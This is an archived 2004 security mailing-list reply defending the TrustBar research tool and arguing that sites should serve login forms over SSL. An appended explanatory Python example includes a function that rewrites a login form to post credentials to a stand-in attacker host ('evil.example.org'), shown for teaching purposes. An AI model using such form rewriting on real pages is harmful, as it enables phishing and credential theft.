WebApp Sec mailing list archives
Re: TrustBar and insecure sites of PayPal, MS Passport, Yahoo!, Chase, ...
From: Amir Herzberg <herzbea () cs biu ac il>
Date: Tue, 26 Oct 2004 14:50:48 +0200
Yvan G.J. Boily wrote:
> The point Mr. Wall was trying to make is that using SSL to "protect" a login page prior to the actual (HTTP Verb) which submits the credentials to the web server does nothing to prevent a user from falling victim to a spoofed web page.

That's incorrect. By protecting the login form, we prevent a rogue page which appears as the original, but sends the password to the attacker instead of sending it (securely) to the correct site.
> Your trustbar tool is essentially just another way of putting information in front of the user's face, however it does nothing that isn't already available.

This is mostly correct; TrustBar is a secure user interface mechanism. Our research (and common sense) shows that most users do not validate the URL and the certificate, but do notice our `unprotected page` warning vs. the correct logo of the site.
TrustBar also protects from the more advanced (academical?) spoofing attacks, that present fake location bar, padlock etc. But I think that's less important in practice.
> Since the "trustbar" is not part of the default distribution of a browser it will not do much to further awareness, or protect a user. This is more so the case because a user who has the understanding to install the software will generally not be caught by a phishing scam or fooled by a spoofed server.
Well... TrustBar is just a research project; we definitely hope the ideas in it will be adopted in future releases of browsers. Also, I think that in many cases, it could be installed on machines of naive users (e.g. by the employer, organization, ISP, etc.). Finally, I actually believe that even security savvy users will find it much more convenient and secure to use TrustBar (or comparable technology) compared to checking manually whenever they use a sensitive site... I definitely feel much better about doing my e-banking now.
<skip>
> The reason this is important is because you claim the "lock" icon is misleading. I say that the lock icon is more intuitive than a "trust bar" or the SSL warnings. People using e-commerce sites have been indoctrinated to "look for the padlock" and "click on it for more information".

That's an interesting possibility... I didn't get this feedback in the surveys we did so far, but I'll try to check specifically for it in the future. BTW, I tried doing it on the Chase site and still didn't find any way to reach a protected login page there... is there?
> It is my opinion that you are likely doing more damage than good by spreading fear, uncertainty, and doubt about a widely used, and commonly accepted practice about which your proposed solution does essentially nothing.

Sorry, that's not my intention. In all your arguments, I didn't see an answer to my simple question: why don't they protect the login page??? Considering that there is a trivial fix to the problem, and that I've pointed it out to all these sites before informing others, I can't really see where you find me wrong.
> I apologize if this seems unduly harsh, but I think that you may have lost sight of the intended audience during your academic pursuits.
No offense taken.

Best, Amir Herzberg
http://AmirHerzberg.com
Associate Professor, Computer science department, Bar Ilan University
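The distinction argued over in this message (the login form itself must arrive over SSL, not merely be submitted over SSL) as an added worked example. This is not code from TrustBar, from either correspondent, or from any of the sites named in the subject line; the hostnames, page URLs and HTML documents below are constructed for illustration and do not reproduce any real site's markup.

```python
"""Classify password forms by whether the page carrying them was itself
served over TLS, not only whether the form submits over TLS.

Added example for this thread; not TrustBar code and not any real site's
markup. All URLs and HTML here are constructed for illustration."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Collect (action, has_password_field) for every <form> on a page."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None  # [action, has_password] of the open <form>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = [a.get("action") or "", False]
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current[1] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(tuple(self._current))
            self._current = None


def classify_login_page(page_url, html):
    """One verdict per password form on the page.

    'protected'       page and form target are both https; a rogue copy
                      cannot be substituted without failing the cert check
    'unprotected'     the page came over plain http, so anyone on the path
                      (or a phisher cloning it) can rewrite the form action
                      before the user sees it; the target scheme alone says
                      nothing about where the password really goes
    'insecure_submit' page is https but the form posts over http, so the
                      credentials leave the browser in the clear
    """
    parser = _FormCollector()
    parser.feed(html)
    page_https = urlsplit(page_url).scheme == "https"
    verdicts = []
    for action, has_password in parser.forms:
        if not has_password:
            continue
        target = urljoin(page_url, action)
        submit_tls = urlsplit(target).scheme == "https"
        if not page_https:
            verdict = "unprotected"
        elif not submit_tls:
            verdict = "insecure_submit"
        else:
            verdict = "protected"
        verdicts.append({"action": target, "submit_tls": submit_tls,
                         "verdict": verdict})
    return verdicts


def rogue_copy(html, attacker_action):
    """What an on-path attacker does to an http-served login page: keep
    every pixel of the page, change only where the form posts."""
    return re.sub(r'action="[^"]*"', 'action="%s"' % attacker_action,
                  html, count=1)


# Constructed sample pages (hypothetical hosts, not real site markup).
PAGE_POSTS_HTTPS = """<html><body>
<form action="https://login.example.net/auth" method="post">
  <input type="text" name="user">
  <input type="password" name="pass">
  <input type="submit" value="Log in">
</form></body></html>"""

PAGE_POSTS_HTTP = PAGE_POSTS_HTTPS.replace("https://login", "http://login")


def demo():
    """Run the classifier over the four situations the thread discusses."""
    http_home = "http://www.example.net/"
    https_home = "https://www.example.net/"
    return {
        # the pattern objected to in this thread: http page, https POST
        "http_page": classify_login_page(http_home, PAGE_POSTS_HTTPS),
        # the trivial fix: serve the login page itself over https
        "https_page": classify_login_page(https_home, PAGE_POSTS_HTTPS),
        # the reverse mistake
        "https_page_http_post": classify_login_page(https_home, PAGE_POSTS_HTTP),
        # the http page after an attacker rewrote the form target
        "rogue": classify_login_page(
            http_home,
            rogue_copy(PAGE_POSTS_HTTPS, "https://evil.example.org/collect")),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The "rogue" case is the one that matters for the argument: the rewritten page still posts over https (so a check that only asks "does the POST use SSL?" is satisfied), yet the credentials go to the attacker's host, because nothing authenticated the page that chose the target. Only when the page is itself served over https can the browser's certificate check bind the form to the site the user thinks they are on.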
Current thread:
- Re: TrustBar and insecure sites of PayPal, MS Passport, Yahoo!, Chase, ... Amir Herzberg (Oct 28)
- RE: TrustBar and insecure sites of PayPal, MS Passport, Yahoo!, Chase, ... Yvan G.J. Boily (Oct 28)